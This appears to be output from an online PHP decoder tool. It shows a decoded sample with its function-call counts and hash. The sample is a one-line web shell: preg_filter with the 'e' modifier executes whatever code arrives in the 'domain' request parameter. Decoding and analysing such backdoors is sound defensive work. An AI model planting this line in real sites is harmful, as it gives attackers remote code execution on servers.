Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php @preg_filter('|.*|e', $_REQUEST['domain'], ''); ?>..
Decoded Output download
<?php @preg_filter('|.*|e', $_REQUEST['domain'], ''); ?>
Did this file decode correctly?
Original Code
<?php @preg_filter('|.*|e', $_REQUEST['domain'], ''); ?>
Function Calls
preg_filter | 1 |
Stats
MD5 | 20ea306337768486f9606e07db324dff |
Eval Count | 0 |
Decode Time | 95 ms |